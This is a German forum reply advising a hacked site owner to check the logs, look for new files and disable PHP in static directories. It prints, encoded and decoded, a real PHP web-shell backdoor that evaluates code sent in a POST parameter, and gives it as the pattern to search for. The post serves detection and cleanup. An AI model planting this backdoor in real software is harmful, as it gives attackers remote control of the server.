Ich bin mir rauchendem Kopf am Machen. Mal sehen, was rauskommt.
In der - von mir genannten Exploit Datenbank kannst du sehen, wie ein Angriff auf deine Seite aussehen könnte.
es sollte reichen, wenn du die Log-Files zum Angriff-Zeitpunkt dir durch suchst.
Wenn du deine Dateien und Verzeichnisse nicht gelöscht hast (- keine gute Idee) suche nach neuen Dateien. Wer .htaccess Dateien erstellen konnte - kann auch Scripte erstellen.
Php Scripte müssen in keinem Verzeichnis funktionieren in dem nur deine statischen Daten (java scripte, Flash Filme, Bilder, css) liegen. Schalte dort in diesen Verzeichnissen PHP aus.
Suche in den PHP Scripten nach
Um fremden code ausführen zu können, verwenden Script Angreifer
in ihren Scripten in der Regel "eval" die Zeile sieht aus
eval(urldecode($_POST["main"]
oder jetzt aus der Ralitätit
<?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbInBhcnQiXSkpIHsgIGlmKCRfR0VUWyJwYXJ0Il09PSJzZWMiKSAgZWNobyAicGFydGdvb2QiOyB9IGVsc2UgaWYoaXNzZXQoJF9QT1NUWyJnZ2ciXSkpIHsgICBpZigkX1BPU1RbImdnZyJdPT0xKSAgICAgICAgZWNobyAib2sxMSI7ICB9IGVsc2UgaWYoaXNzZXQoJF9QT1NUWyJtYWluIl0pKSB7ICBldmFsKHVybGRlY29kZSgkX1BPU1RbIm1haW4iXSkpOyAgICB9")); ?>
dort steht
eval(if(isset($_GET["part"])) { if($_GET["part"]=="sec") echo "partgood"; } else if(isset($_POST["ggg"])) { if($_POST["ggg"]==1) echo "ok11"; } else if(isset($_POST["main"])) { eval(urldecode($_POST["main"])); }
Erst wenn du die Sicherheistlüscke in den Log-Files und Script gefunden hast - kannst du diese schließen.
evtl. hat dein Provider ein Problem und der Angriff erfolgte nicht über deine Anwendungen.
Viel Glück
ralf